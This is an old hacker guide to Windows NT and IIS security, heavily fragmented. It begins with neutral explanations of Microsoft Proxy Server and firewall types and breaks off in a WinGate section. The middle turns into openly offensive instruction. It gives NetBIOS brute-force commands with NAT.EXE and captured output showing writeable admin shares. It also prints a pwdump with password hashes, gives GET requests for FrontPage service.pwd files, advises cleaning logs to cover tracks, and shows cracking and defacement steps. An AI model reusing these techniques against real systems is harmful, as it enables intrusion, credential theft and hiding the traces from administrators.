DLL (dynamic link library) that uses ISAPI (Internet Server Application Programming Interface) and therefore runs within the IIS WWW process. The WWW Service must installed and running in order for proxy requests to be proces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WinSock Proxy: WinSock Proxy provides proxy services for windows sockets applications. WinSock Proxy allows winsock applications to function on a LAN and to operate as if it is directly connected to the Internet. The client app uses Windows Sockets APIs to communicate with another application running on an Internet computer. WinSock Proxy intercepts the windows sockets call and establishes a communication path from the internal application to the Internet application through the proxy server. The process is totally transparent to the client. The WinSock Proxy consists of a service running on Proxy Server and a DLL installed on each client. The DLL it relies on is the Remote Winsock DLL that replaced the normal winsock.dll. WinSock Proxy uses a control channel between the client and the server to manage the ability of Windows Sockets messages to be used remotely. The control channel is set up when the WinSock Proxy client DLL is first loaded, and it uses the connectionless UDP protocol. The Winsock Proxy client and the WinSock Proxy service use a simple ack protocol to add reliability to the control channel. The control channel uses UDP port 1745 on the proxy server and client comput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OCKS Proxy: Proxy Server supports SOCKS Version 4.3a. Almost all SOCKS V4.0 client applications can run remotely through SOCKS Proxy. SOCKS is a protocol that functions as a proxy. It enables hosts on one side of a SOCKS server to gain full access to hosts on the other side of a SOCKS server, without requiring direct IP access.  (To learn more about SOCKS, visit http://www.socks.nec.com/index.htm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0] Understanding compon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area will attempt to better define to the components of the architecture that we have used, but may not have def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1] ISAPI Fil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ISAPI Filter interface is one of the components of the web proxy service. The interface provides an extension that the Web server calls whenever it receives an HTTP requ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 ISAPI Filter is called for every request, regardless of the identity of the resource requested in the URL. An ISAPI filter can monitor, log, modify, redirect and authenticate all requests that are received by the Web server. The Web service can call an ISAPI filter DLL's entry point at various times in the processing of a request or response. The Proxy Server ISAPI filter is contained in the w3proxy.dll file. This filter examines each request to determine if the request is a standard HTTP request or no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2] ISAPI Applic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ISAPI Application is the second of the two web proxy components.  ISAPI applications can create dynamic HTML and integrate the web with other service applications like databa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like ISAPI Filters, an ISAPI Application is invoked for a request only if the request references that specific application. An ISAPI Application does not initiate a new process for every request. The ISAPI Application is also contained in the w3proxy.dll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3] Proxy Servers Caching Mechanis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icrosoft Proxy Server handles caching in two different ways, Passive and Active cach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Passive Caching: Passive caching is the basic mode of caching. Proxy Server interposes itself between a client and an internal or external Web site and then intercepts client requests. Before forwarding the request on to the Web server, Proxy Server checks to see if it can satisfy the request from its cache. Normally, in passive caching, Proxy Server places a copy of retrieved objects in the cache and associates a TTL (time-to-live) with that object. During this TTL, all requests for that object are satisfied from the cache. When the TTL is expired, the next client request for that object will prompt Proxy Server to retrieve a fresh copy from the web. If the disk space for the cache is too full to hold new data, Proxy Server removes older objects from the cache using a formula based on age, popularity, and siz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ctive Caching: Active Caching works with passive caching to optimize the client performance by increasing the likelihood that a popular will be available in cache, and up to date. Active caching changes the passive caching mechanism by having the Proxy Server automatically generate requests for a set of objects. The objects that are chosen are based on popularity, TTL, and Server Lo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4] Windows Socke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dows Sockets is the mechanism for communication between applications running on the same computer or those running on different computers which are connected to a LAN or WAN. Windows Sockets defines a set of standard API's that an application uses to communicate with one or more other applications, usually across a network. Windows Sockets supports initiating an outbound connection, accepting inbound connections, sending and receiving data on those connections, and terminating a se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dows socket is a port of the Berkeley Sockets API that existed on Unix, with extensions for integration into the Win16 and Win32 application environments. Windows Sockets also includes support for other transports such as IPX/SPX and NetBEU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dows Sockets supports point-to-point connection-oriented communications and point-to-point or multipoint connectionless communications when using TCP/IP. Windows Socket communication channels are represented by data structures called sockets. A socket is identified by an address and a port, for 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107.2.200:8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5] Access Control Using Proxy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6] Controlling Access by Internet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xy Server can be configured to provide or restrict access based on Service type. FTP, HTTP, Gopher, and Secure (SSL) are all individually configur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7] Controlling Access by IP, Subnet, or Do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xy allows an administrator to control access based on IP Address, Subnet or Domain. This is done by enabling filtering and specifying the appropriate parameters. When configuring this security, you need to decide if you want to grant or deny access to an IP address, subnet, or domain.  By configuring Proxy Server correctly, you can also set it up to use the internet as your corporate W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8] Controlling Access by Po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you are using the WinSock Proxy service, you can control access to the internet by specifying which port is used by TCP and UDP. You can also grant or deny, activate or disable certain ports based on your nee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1.9] Controlling Access by Packet Typ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xy Server can control access of external packets into the internal network by enabling packet filtering on the external interface. Packet filtering intercepts and evaluates packets from the Internet before they reach the proxy server. You can configure packet filtering to accept or deny specific packet types, datagrams, or packet fragments that can pass through Proxy Server. In addition, you can block packets originating from a specific Internet ho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acket filtering provided by Proxy Server is available in two forms, Dynamic and Stat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ynamic packet filtering allows for designed ports to automatically open for transmission, receive, or both. Ports are then closed immediately after connection has been terminated, thereby minimizing the number of open ports and the duration of time that a port is op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ic packet filtering allows manual configuration of which packets are and are not allow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y default, the following Packet settings are enabled on Proxy Server (by default, ALL packet types are blocked except the ones listed below, known as Excep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bound</w:t>
        <w:tab/>
        <w:t xml:space="preserve"> ICMP ECHO (P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bound </w:t>
        <w:tab/>
        <w:t xml:space="preserve"> ICMP RESPONSE (P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bound </w:t>
        <w:tab/>
        <w:t xml:space="preserve"> ICMP SOURCE QUEN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bound </w:t>
        <w:tab/>
        <w:t xml:space="preserve"> ICMP TIME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bound </w:t>
        <w:tab/>
        <w:t xml:space="preserve"> ICMP UNREACH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utbound </w:t>
        <w:tab/>
        <w:t xml:space="preserve"> ICMP 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bound </w:t>
        <w:tab/>
        <w:t xml:space="preserve"> TCP HTT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Outbound       UDP ANY (d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0] Logging and Event Aler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vents that could affect your system may be monitored, and, if they occur, alerts can be generated. The items listed below are events that will generate aler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jected Packets: Watches external adapter for dropped IP packe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tocol Violations: Watches for packets that do not follow the allowed protocol struc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isk Full: Watches for failures caused by a full dis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en any of the events above occur, an alert is sent to the system log in the NT Event Viewer, or can be configured to e-mail a pre-defined pers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en the system logs information concerning Access Control, it does so to a log file stored in the %systemroot%/system32/msplogs/ directory. The log file itself is named Pfyymmdd.log (Where yy=Current year / mm= Current Month / dd= Current d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acket log records information related to the following area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ice Information (Time of Service, Date and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mote Information (The Source IP Address of a possible Intruder, along with port and protocol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cal Information (Destination IP Address and po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lter Information (Action taken and what interface (network adapter) issued the a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cket Information (Raw IP Header in Hex and Raw IP Packet in He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1] Encryption Issu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xy Server can take full advantage of the authentication and security features of Internet Information Server and SSL tunnel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SL supports data encryption and server authentication. All data sent to and from the client using SSL is encrypted. If HTTP basic authentication is used in conjunction with SSL, the user name and password are transmitted after the client's SSL support encrypts th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your are wanting to take advantage of PPTP to provide additional flexibility and security for your clients, you can configure Proxy Server to allow these packets (GRE) to pass throug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2] Other Benefits of Proxy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3] RA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xy Server can take full advantage of Windows NT Remote Access Service (RAS).  Proxy can be configured to dial on demand when an internal client makes a request that must be satisfied from the external network. The RAS feature can be configured to only allow connectivity during certain hours. The Dial-Up Network Scripting tool can aslo be used to automate certain process using Proxy Server and RAS. For company's who have a standard constant connection (ISDN, T1, T3) to the Internet, the RAS ability provided by Proxy Server can be used as a back-up should your constant connection fa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4] IPX/SP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icrosoft Proxy Server was developed with support for Internet Packet Exchange/Sequenced Packet Exchange or IPX/SPX. IPX/SPX is a transport protocol group somewhat similar to TCP/I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are many situations when a client computer may have both IPX/SPX and TCP/IP protocols installed although the company's internal network may only use IPX/SPX. Simply disabling aTCP/IP while on the LAN will not get the IPX/SPX component of the Proxy client software working. You will need to go into Control Panel, open the Wsp Client icon and check the box that reads "Force IPX/SPX protocol". This must be done because even though the TCP/IP protocol was disabled, the WinSock Proxy Client still detects its presence and will attempt to create a standard IP socket. By enabling the "Force IPX/SPX Protocol" option, this problem should disappea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5] Firewall Strateg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firewall is a system that enforces access control policies. The enforcement is done between an internal, or "trusted" network and an external, or "untrusted" network. The firewall can be as advanced as your standards require. Firewalls are commonly used to shield internal networks from unauthorized access via the Internet or other external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6] Logical Constru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ingle basic function of a firewall is to block unauthorized traffic between a trusted system and an untrusted system. This process is normally referred to as Filtering. Filtering can be viewed as either permitting or denying traffic access to a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rewalls know what traffic to block because they are configured with the proper information. This information is known as an Access Control Policy. The proper approach to an access control policy will depend on the goals of the network security policy and the network administra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7] Exploring Firewall Typ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the origins of firewalls, there were two types. These two types have now grown and overlapped each other to the point where distinction is hard. We will explore the differences between these two types and discuss Firewall building topolog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work Level Firewal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work level firewalls operate at the IP packet level. Most of these have a network interface to the trusted network and an interface to the untrusted network. They filter by examining and comparing  packets to their access control policies or AC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work level firewalls filter traffic based on any combination of Source and Destination IP, TCP Port assignment and Packet Type. Network Level firewalls are normally specialized IP routers. They are fast and efficient and are transparent to network operations. Todays network level firewalls have become more and more complex. They can hold internal information about the packets passing through them, including the contents of some of the data. We will be discussing the following types of network level firewal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Bastion Ho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creened Ho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creened Sub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astion Host Firew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astion host are probably one of the most common types of firewalls. The term bastion refers to the old castle structures used in Europe, mainly for draw bridg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Bastion host is a computer with at east one interface to the trusted network and one to the untrusted network. When access is granted to a host from the untrusted network by the bastion host, all traffic from that host is allowed to pass unboth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a physical layout, bastion hosts normally stand directly between the inside and outside networks, with no other intervention. They are normally used as part of a larger more sophisticated firewal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disadvantages to a bastion host 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fter an Intruder has gained access, he has direct access to the entire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Protection is not advanced enough for most network applic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creened Host Firew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more sophisticated network level firewall is the screened host firewall. This firewall uses a router with at least on connection to trusted network and one connection to a bastion host. The router serves as a preliminary screen for the bastion host. The screening router sends all IP traffic to the bastion host after it filters the packets. The router is set up with filter rules. These rules dictate which IP addresses are allowed to connect, and which ones are denied access. All other packet scrutiny is done by the bastion host. The router decreases the amount of traffic sent to the bastion host and simplifies the bastions filtering algorith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hysical layout of a Screened Host is a router with one connection to the outside network, and the other connection with a bastion host. The bastion host has one connection with the router and one connection with the inside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isadvantages to the Screened Host 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he single screen host can become a traffic bottlene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If the host system goes down, the entire gateway is dow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creened Subnet Firewal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creened subnet uses on or more addition routers and on more additional bastion hosts. In a screened subnet, access to and from the inside network is secured by using a group of screened bastion host computers. Each of the bastion hosts acts as a drawbridge to the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hysical layout of a Screened subnet is somewhat more difficult, but the result is a more secure, robust environment. Normally, there is a router with one connection to the outside network and the other connection to a bastion host. The bastion host has one connection to the outer most router and one connection to another bastion host, with an addressable network in the middle. The inner most bastion host has one connection to the outer most bastion and another connection to an inside router. The inside router has one connection to the inner bastion host and the other connection to the inside network. The result of this configuration is the security components are normally never bogged down with traffic and all internal IP addresses are hidden from the outside, preventing someone from "mapping" your internal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isadvantages to using this type of firewall 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he can be two or three times more expensive than other types of firewal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Implementation must be done by some type of security professional, as these types of firewalls are not for the un-initia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pplication Level Firewal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pplication level firewalls are hosts running proxy server software located between the protected network and the outside network. Keep in mind that even though Microsofts product is called Proxy Server 2.0, it is actually a stand alone Bastion Host type of system. Microsoft Proxy Server can also, single-handedly, disguise your internal network to prevent mapping. Microsoft Proxy Server 1.0 did not have many of the advanced features presented in version 2.0. The 1.0 version can definitely be called a true proxy server, while the 2.0 version is more of a firew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iewed from the client side, a proxy server is an application that services network resource requests by pretending to be the target source. Viewed from the network resource side, the proxy server is accessing network resources by pretending to be the client. Application level firewalls also do not allow traffic to pass directly between to the two networks. They are also able to use elaborate logging and auditing features. They tend to provide more detailed audit reports, but generally, as stand alone security unites, do not perform that well. Remember that an Application level firewall is software running on a machine, and if that machine can be attacked effective and crashed, in effect, youre crashing the firew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may wish to use an application level firewall in conjunction with network level firewalls, as they provide the best all around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7.2.3] NT Security Twigs and E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ets jump right in. For those of  you who are not riggers (architecture/network media specialists) let me begin by saying that NT as an operating system is fairly safe and secure. Now you may think to yourself that it isn't, but think about all the Unix related security holes you know of, a ton huh? Anyhow, as with any operating system, NT has holes, lets see what we can learn about these holes, shall w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First things first, NT does not support alot of  the normal TCP/IP functions that youre used to. NT does not normally support NFS, SunRPC, NIS, r* commands, Telnet, and some other obscure on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n order for NT to allow for various system services to be performed on a remote computer, it uses RPC, remote procedure calls. Please do not confuse this with SunRPC. You can run NT/RPC's over a NetBIOS/SMB session or you can piggie back it directly off of  TCP/IP (or other transport protocol, perhaps NWLink IPX/SPX). Unfortunately we dont have any good documentation on what inherent services NT provides through native RPC. Complex server type programs (Like Exchange) provide their own RPC services in addition to the ones NT provides as an operating system --(TCP Port 135 is used as a port-mapper port, we also know that if too much information is fed through port 135, you can crash an NT box.). Some client software must access TCP port 135 before accessing the RPC service itself (hint, hint). Keep in mind that TCP port 135 can be blocked. Bummer, e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One problem among the Hacker community is that most hackers dont like to investigate new avenues, or explore new methods. They will take the easy way out, using a method thats already been documented by someone else. So what if they come across a system that has patched that security problem? Will todays hacker try to find a new way in? Nope... most of the slackers I know will give up. It is for this reason that alot of the members in the community have never heard of SMBs, because its a session level protocol  that is not a Unix standard (although there is something somewhat like SMBs for Unix, known as Samba). SMBs are used by Windows 3.X, Win95, WintNT and OS/2. The one thing to remember about SMBs is that it allows for remote access to shared directories, the registry, and other system services. Which makes it important in our line of, uuuhh, work. As stated above, unfortunately, there is no good documentation of the services that use SMB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Now, a couple of Key Poi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MBs are used b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in 3.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in 9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in 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OS/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MBs allow for remote access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hared directo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e Regi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Other system serv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You will find that by default all accounts in NT have complete SMB functionality. This includes the Guest account. (In WinNT 3.51, the guest is auto created and active, in WinNT 4.0, the guest account is auto created but is not active) Now, 2 things to remember: When it comes to login attempt failures, the administrator account IS NEVER locked out after a certain number of login attempts (this rule ALWAYS applies), also by default, when windows NT is installed, NONE of the accounts have fail login attempt lock out. Also, in order for SMB to work, UDP/TCP ports 137,138,139 (NetBIOS over TCP) must be op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word about Remote registry alteration: By default the Everyone group in NT has write access to much of the registry. In NT 3.51, this was a major issue due to the remote registry access feature of RegEdit. Any user could manipulate the registry on any server or workstation on which his account (or the guest account) was enabled. WindowsNT fixed the problem with this registry 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LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurePipesServers\winre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 true, remote registry editing is not allowed in NT4, but this rule does not apply to Administrator (or perhaps other users in the Administrators group.. ::gr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Ok, so far we've covered some pretty good information, but lets go into that new product that microsoft loves so much. The product they really hyped.. NTFS (NewTechnologiesFileSystem). First of all, NTFS is a rip off of the OS/2 file system, HPFS. No biggie, lets not get picky. Anyhow, NTFS is actually a beautiful thing, if used properly. NTFS allows administrator to not only put access permissions on folders, but it also allows for access permissions on individual files within that fold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ample: Jane and Ralph both have access to the folder 'Shoes'. Theres only one file within the 'shoes' folder. Only jane has access to this one file, Ralph does not. So when Ralph opens the 'shoe' folder, it appears empty, but when Jane opens the 'shoe' folder, the file is the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 If an administrator does not set permissions on files within a folder but you know the exact path to the file, you can copy the file out of the folder onto a FAT (File Allocation Table) system, successfully bypassing the security. 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lder 'Shoes' has permissions on it. You do not have access permission to the folder, BUT if you typ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copy c:\shoes\secure.txt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t would allow you to copy the file. Pretty neat hu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have heard that the latest NT4 patches have corrected this problem, I will let ya know when I get a chance to test it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le Sharing, I love those words. SMB file and print server protocols used by NT are harder to spoof than the NFS implementation on Unix systems. It is possible that a gateway (and I dont mean the brand name company) machine could spoof an SMB session, then read and write any files to which the true user of the session had access. -WARNING- This method is not for the beginn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w, windows allows for this wonderful thing called User Profiles. This allows for users to have login scripts, personalized desktops, etc etc. Now some very personal information can be contained within these profiles. For example, some users put the userid and password that they use for Microsoft Mail onto their logon script, this way when they log into the machine, it auto logs them into their mailbox. User profiles are stored in the %SYSTEMROOT%\SYSTEM32\CONFIG directory and also on a shared directory on the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ets discuss our little friend, the special share. NT shares the %SYSTEMROOT%\SYSTEM32\REPL\IMPORT\SCRIPTS directory, this way, users can read their login scripts during login. Under normal default conditions, ANYONE can access this share and read anyone elses login script. So whatever juicy pieces of information are in the login script are now yours. Some other special shares are created depending on other software installed on NT or other servers that NT has to cooperate with. These other shares will probably be discussed in another BlackPap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etting lucky with that special account. There is a certain type of NT account that has the ability to BackUp and Restore database and account information. Accounts of this type have the ability to read, modify and write any file in the system. So, if ya cant get the Admin account, who knows... maybe theres a backup operator account. Ya never k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rt Tw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Techniques for Surviv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0] NetBIOS Attack Metho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NetBIOS attack technique was verified on Windows 95, NT 4.0 Workstation, NT 4.0 Server, NT 5.0 beta 1 Workstation, NT 5.0 beta 1 Server, Windows 98 beta 2.1. One of the components being used is NAT.EXE by Andrew Tridgell. A discussion of the tool, it switches, and common technique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T.EXE [-o filename] [-u userlist] [-p passlist] &lt;address&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witch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o     Specify the output file.  All results from the sc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ill  be written to the specified file, in addi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o standard outp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u     Specify the file to read usernames from.  Userna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ill  be read from the specified file when attemp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ng to guess the password  on  the  remote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Usernames  should appear one per line in the spec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fied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     Specify the file to read passwords from.  Passwo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ill  be read from the specified file when attemp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ng to guess the password  on  the  remote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asswords  should appear one per line in the spec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fied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t;address&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ddresses should be specified in comma  delimina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format,  with  no spaces.  Valid address specific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ions inclu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hostname - "hostname" is add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27.0.0.1-127.0.0.3,   adds   addresses   127.0.0.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rough 127.0.0.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27.0.0.1-3,   adds   addresses  127.0.0.1  throug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27.0.0.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27.0.0.1-3,7,10-20,   adds   addresses   127.0.0.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rough  127.0.0.3,  127.0.0.7,  127.0.0.10 throug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27.0.0.2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hostname,127.0.0.1-3, adds "hostname" and 127.0.0.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rough 127.0.0.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ll combinations of hostnames and address ranges a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pecified above are vali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1] Comparing NAT.EXE to Microsoft's own executab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2] First, a look at NBTST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irst we look at the NBTSTAT command. This command was discussed in earlier portions of the book ( [5.0.6] The Nbtstat Command ). In this section, you will see a demonstration of how this tool is used and how it compares to other Microsoft tools and non Microsoft tool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at follows is pretty much a step by step guide to using NBTSTAT as well as extra information. Again, if youre interested in more NBSTAT switches and functions, view the [5.0.6] The Nbtstat Command portion of the boo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nbtstat -A XXX.XX.XXX.X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NetBIOS Remote Machine Name T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Name               Type         Stat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1       &lt;20&gt;  UNIQUE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1       &lt;00&gt;  UNIQUE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AIN1        &lt;00&gt;  GROUP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AIN1        &lt;1C&gt;  GROUP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AIN1        &lt;1B&gt;  UNIQUE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1       &lt;03&gt;  UNIQUE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AIN1        &lt;1E&gt;  GROUP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AIN1        &lt;1D&gt;  UNIQUE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__MSBROWSE__.&lt;01&gt;  GROUP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C Address = 00-C0-4F-C4-8C-9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re is a partial NetBIOS 16th bit lis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putername &lt;00&gt; UNIQUE workstation service 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lt;00&gt; GROUP  domain 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er              &lt;20&gt; UNIQUE Server Service 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putername &lt;03&gt; UNIQUE Registered by the messenger service. This is the computer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o be added to the LMHOSTS file which is not necessary to u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NAT.EXE but is necessary if you would like to view the remo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computer in Network Neighborhoo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lt;03&gt;  Registered by the messenger servi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ainname   &lt;1B&gt;  Registers the local computer as the master browser for the do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ainname   &lt;1C&gt;  Registers the computer as a domain controller for the do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DC or BD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ainname   &lt;1D&gt;  Registers the local client as the local segments master brow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for the do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ainname   &lt;1E&gt;        Registers as a Group NetBIOS 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t;BF&gt;        Network Monitor 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t;BE&gt;        Network Monitor Ag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t;06&gt;         RAS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t;1F&gt;         Net D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t;21&gt;         RAS Cli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3] Intro to the NET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NET command is a command that admins can execute through a dos window to show information about servers, networks, shares, and connections. It also has a number of command options that you can use to add user accounts and groups, change domain settings, and configure shares. In this section, you will learn about these NET commands, and you will also have the outline to a NET command Batch file that can be used as a primitive network security analysis tool. Before we continue on with the techniques, a discussion of the available options will come fir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4] Net Accounts: This command shows current settings for password, logon limitations, and domain information. It also contains options for updating the User accounts database and modifying password and logon requirem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5] Net Computer: This adds or deletes computers from a domains databa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6] Net Config Server or Net Config Workstation: Displays config info about the server service. When used without specifying Server or Workstation, the command displays a list of configurable serv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7] Net Continue: Reactivates an NT service that was suspended by a NET PAUSE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8] Net File: This command lists the open files on a server and has options for closing shared files and removing file loc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0.9] Net Group: This displays information about group names and has options you can use to add or modify global groups on serv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0] Net Help: Help with these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1] Net Helpmsg message#: Get help with a particular net error or function mess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2] Net Localgroup: Use this to list local groups on servers. You can also modify those grou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3] Net Name: This command shows the names of computers and users to which messages are sent on the compu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4] Net Pause: Use this command to suspend a certain NT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5] Net Print: Displays print jobs and shared queu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6] Net Send: Use this command to send messages to other users, computers, or messaging names on the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7] Net Session: Shows information about current sessions. Also has commands for disconnecting certain sess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8] Net Share: Use this command to list information about all resources being shared on a computer. This command is also used to create network shar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1.9] Net Statistics Server or Workstation: Shows the statistics lo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2.0] Net Stop: Stops NT services, cancelling any connections the service is using. Let it be known that stopping one service, may stop other serv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2.1] Net Time: This command is used to display or set the time for a computer or do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2.2] Net Use: This displays a list of connected computers and has options for connecting to and disconnecting from shared resour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2.3] Net User: This command will display a list of user accounts for the computer, and has options for creating a modifying those accou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2.4] Net View: This command displays a list of resources being shared on a computer. Including netware serv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2.5] Special note on DOS and older Windows Machines: The commands listed above are available to Windows NT Servers and Workstation, DOS and older Windows clients have these NET commands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Confi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Diag (runs the diagnostic progr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Hel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Init (loads protocol and network adapter driv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Logof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Log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Password (changes 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Pri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Sta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Sto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U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Ver (displays the type and version of the network redirec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Vie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this section, the command being used is the NET VIEW and NET USE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2.6] Actual NET VIEW and NET USE Screen Captures during a h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net view XXX.XX.XXX.X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ared resources at XXX.XX.XXX.X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are name   Type         Used as  Com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LOGON     Disk                  Logon server sh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st         Dis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mmand completed successful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e C$ ADMIN$ and IPC$ are hidden and are not show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net us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yntax of this command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USE [devicename | *] [\\computername\sharename[\volume] [password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USER:[domainname\]user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DELETE] | [/PERSISTENT:{YES | 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USE [devicename | *] [password | *]] [/HO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 USE [/PERSISTENT:{YES | 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net use x: \\XXX.XX.XXX.XX\t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mmand completed successful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unzipped\nat10bin&gt;net u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w connections will be rememb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       Local     Remote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K           X:        \\XXX.XX.XXX.XX\test      Microsoft Windows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K                     \\XXX.XX.XXX.XX\test      Microsoft Windows Net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mmand completed successful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re is an actual example of how the NAT.EXE program is used. The information listed here is an actual capture of the activity. The IP addresses have been changed to protect, well, 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nat -o output.txt -u userlist.txt -p passlist.txt XXX.XX.XX.XX-YYY.YY.YYY.Y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Reading usernames from userlist.tx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Reading passwords from passlist.tx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hecking host: XXX.XX.XXX.X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Obtaining list of remote NetBIOS na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connect with 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Unable to conne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connect with name: *SMB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ONNECTED with name: *SMB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connect with protocol: MICROSOFT NETWORKS 1.0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erver time is Mon Dec 01 07:44:34 199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imezone is UTC-6.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Remote server wants us to encrypt, telling it not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connect with name: *SMB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ONNECTED with name: *SMB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establish se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Was not able to establish session with no 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connect with Username: `ADMINISTRATOR' Password: `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ONNECTED: Username: `ADMINISTRATOR' Password: `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Obtained server inform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er=[STUDENT1] User=[] Workgroup=[DOMAIN1] Do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Obtained listing of shar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Sharename      Type      Com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DMIN$         Disk:     Remote Adm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C$             Disk:     Default sh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IPC$           IPC:      Remote IP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NETLOGON       Disk:     Logon server sha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Test           Dis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his machine has a browse li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Server               Com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STUDENT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access share: \\*SMB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Unable to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access share: \\*SMBSERVER\ADM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WARNING: Able to access share: \\*SMBSERVER\ADM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hecking write access in: \\*SMBSERVER\ADM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WARNING: Directory is writeable: \\*SMBSERVER\ADM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exercise .. bug on: \\*SMBSERVER\ADM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access share: \\*SMBSERVER\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WARNING: Able to access share: \\*SMBSERVER\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hecking write access in: \\*SMBSERVER\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WARNING: Directory is writeable: \\*SMBSERVER\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exercise .. bug on: \\*SMBSERVER\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access share: \\*SMBSERVER\NETLOG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WARNING: Able to access share: \\*SMBSERVER\NETLOG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hecking write access in: \\*SMBSERVER\NETLOG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exercise .. bug on: \\*SMBSERVER\NETLOG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access share: \\*SMBSERVER\T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WARNING: Able to access share: \\*SMBSERVER\T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hecking write access in: \\*SMBSERVER\T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exercise .. bug on: \\*SMBSERVER\T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access share: \\*SMBSERVE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Unable to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access share: \\*SMBSERVER\ROO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Unable to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ttempting to access share: \\*SMBSERVER\WIN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Unable to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the default share of Everyone/Full Control is active, then you are done, the server is hacked. If not, keep playing. You will be surprised what you fin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0.0] Frontpage Extension Attac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fcourse, everyone should know what Microsoft Frontpage is. The server extensions are installed server side to provide added functionality for frontpage web authors. These extensions function as "web bots" if you will, giving web authors that use frontpage easy access to complex web and HTML functions. Soon after the extensions came into wide use, security concerns began to pop-up. Most of these security concerns were very basic, the collection presented below are PROVEN methods that have been tested repeatedly in several types of configuration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0.1] For the tech geeks, we give you an actual PWDUM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s the pwdump from the webserver the Lan Manager password is set to "password". This PWDUMP example is for those of you that have heard about the utility but may have never actually seen the output of one. This dump was used by Vacuum of rhino9 during his journey into cracking the NT encryption algorith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ministrator:500:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C:Built-in account for administering the computer/do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uest:501:NO PASSWORD*********************:NO PASSWORD*********************:Built-in account for guest access to the computer/do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7$:1000:E318576ED428A1DEF4B21403EFDE40D0:1394CDD8783E60378EFEE4050312725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tan:100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ri:100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ng:100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USR_STUDENT7:1014:582E6943331763A63BEC2B852B24C4D5:CBE9D641E74390AD9C1D0A962CE8C24B:Internet Guest Account,Internet Server Anonymous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0.2] The haccess.ctl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hacces.ctl file is sometimes called a shadow password file, well, this is not exactly correct. The file can give you a lot of information, including the location of the service password file. A complete example of the haccess.ctl file is given bel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haccess.ctl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FrontP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ptions N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Limit GET POST PUT&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rder deny,all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ny from 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Limit&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uthName default_real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uthUserFile c:/frontpage\ webs/content/_vti_pvt/service.pw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uthGroupFile c:/frontpage\ webs/content/_vti_pvt/service.gr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ecuting fpservwin.exe allows frontpage server extensions to be installed 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ort 443 (HTTPS)Secure Sockets Lay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ort 80  (HTT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e Limit line. Telneting to port 80 or 443 and using GET, POST, and PUT can be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stead of Frontp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llowing is a list of the Internet Information server files loc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relation to the local hard drive (C:) and the web (www.target.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InetPub\wwwroot                                                             &lt;Home&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InetPub\scripts                                                                 /Scrip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InetPub\wwwroot\_vti_bin                                                /_vti_b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InetPub\wwwroot\_vti_bin\_vti_adm                                /_vti_bin/_vti_ad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InetPub\wwwroot\_vti_bin\_vti_aut                                  /_vti_bin/_vti_a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InetPub\cgi-bin                                                                /cgi-b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InetPub\wwwroot\srchadm                                              /srchad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WINNT\System32\inetserv\iisadmin                                /iisadm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InetPub\wwwroot\_vti_pv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rontPage creates a directory _vti_pvt for the root web and for each FrontPage sub-web. For each FrontPage web with unique permissions, the _vti_pvt directory contains two files for the FrontPage web that the access file points t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ervice.pwd contains the list of users and passwords for the FrontPage web.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ervice.grp contains the list of groups (one group for authors and one for administrators in FrontPag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n Netscape servers, there are no service.grp files. The Netscape password files a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dministrators.pwd for administrato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uthors.pwd for authors and administrato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s.pwd for users, authors, and administrato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InetPub\wwwroot\samples\Search\QUERYHIT.HTM   Internet Information Index Server s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Index Information Server is running under Internet Information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ice.pwd (or any other file) can sometimes be retriev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arch f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ilename=*.pw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Program Files\Microsoft FrontPage\_vti_b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Program Files\Microsoft FrontPage\_vti_bin\_vti_a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Program Files\Microsoft FrontPage\_vti_bin\_vti_ad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WINNT\System32\inetserv\iisadmin\htmldocs\admin.htm  /iisadmin/isadm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InetPub\ftproot                                                                    The default location for the ft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tp service by default runs on the standard port 2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eck to see if anonymous connections are allowed. By default, Internet Information Server creates and uses the account IUSR_computername for all anonymous logons. Note that the password is used only within Windows NT ; anonymous users do not log on using this user name and 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ically, anonymous FTP users will use "anonymous" as the user name and their e-mail address as the password. The FTP service then uses the IUSR_computername account as the logon account for permissions. When installed, Internet Information Server's  Setup created the account IUSR_computername in the Windows NT User Manager for Domains and in Internet Service Manager. This account was assigned a random password for both in Internet Service Manager and in the Windows NT User Manager for Domains. If changed, the password, you must change it in both places and make sure it match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Name and password are case sensiti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canning PORT 80 (http) or 443 (https) op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ET /__vti_inf.html                       #Ensures that frontpage server extens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are instal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ET /_vti_pvt/service.pwd          #Contains the encrypted password fi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Not used on IIS and WebSite serv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ET /_vti_pvt/authors.pwd          #On Netscape servers only. Encryp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names and passwords of autho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ET /_vti_pvt/administrators.pw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ET /_vti_log/author.log              #If author.log is there it will need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be cleaned to cover your trac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ET /samples/search/queryhit.ht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service.pwd is obtained it will look similar to th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cuum:SGXJVl6OJ9zk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bove password is ap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urn it into DES form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cuum:SGXJVl6OJ9zkE:10:200:Vacuum:/users/Vacuum:/bin/ba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9.0.3] Side note on using John the Ripp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un your favorite unix password cracker like John The Ripp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JOHN [flags] [-stdin|-w:wordfile] [passwd fi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lags: -pwfile:&lt;file&gt;[,..]   specify passwd file(s) (wildcards allow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ordfile:&lt;file&gt;      specify wordlist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restore[:&lt;file&gt;]     restore session [from &lt;file&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user:login|uid[,..]  only crack this (these) us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imeout:&lt;time&gt;       abort session after a period of &lt;time&gt; minu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ncremental[:&lt;mode&gt;] incremental mode [using JOHN.INI entry &lt;mode&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ingle               single crack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tdin                read words from std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ist                 list each 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est                 perform a benchma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beep                 beep when a password is fou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quiet                do not beep when a password is found (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noname               don't use memory for login na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ther ways of obtaining service.pw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ttp://ftpsearch.com/index.htm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arch for service.pw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ttp://www.alstavista.digital.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vanced search for link:"/_vti_pvt/service.pw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open a FrontPage we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 the FrontPage Explorer's File menu, choose Open FrontPage We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the Getting Started dialog box, select Open an Existing FrontP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b and choose the FrontPage web you want to op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lick More Webs if the web you want to open is not lis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lick O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you are prompted for your author name and password, you will ha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decrypt service.pwd, guess or move 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ter them in the Name and Password Required dialog box, and click O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ter the existing page, or upload a page of your ow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0] WinG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have been a few papers about WinGate. Some have explained how to bounce through its port 23 telnet proxy. Some have explained how to secure it. In this section we will show you how to use WinGate for its good and bad and you will learn from the good and bad examples. People in the past have said there are flaws and exploits to WinGates and this is wrong. There are system admins that poorly configure their systems but it is not WinGate itself that is the fla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1] What Is WinG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Gate is basically a program that lets you split a connection. Ex: You can share 1 modem with 2 computers. WinGate comes with several proxies and that is where the possible threat lies. (This sharing of internet connection is known as Connection Aggreg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We will only talk about 3 of the more used proxy portions of WinG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2] Defaults After Inst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en you do a regular install of WinGate without changing things there are a few defaul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ort:  |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3      Telnet Proxy Server - This is default and running right after inst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80  SOCKS Server - This once setup via GateKeeper has no password until you set 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667  IRC Mapping - This once setup via GateKeeper has no password until you set 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biggest threat to your server is the port 23 telnet prox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3] Port 23 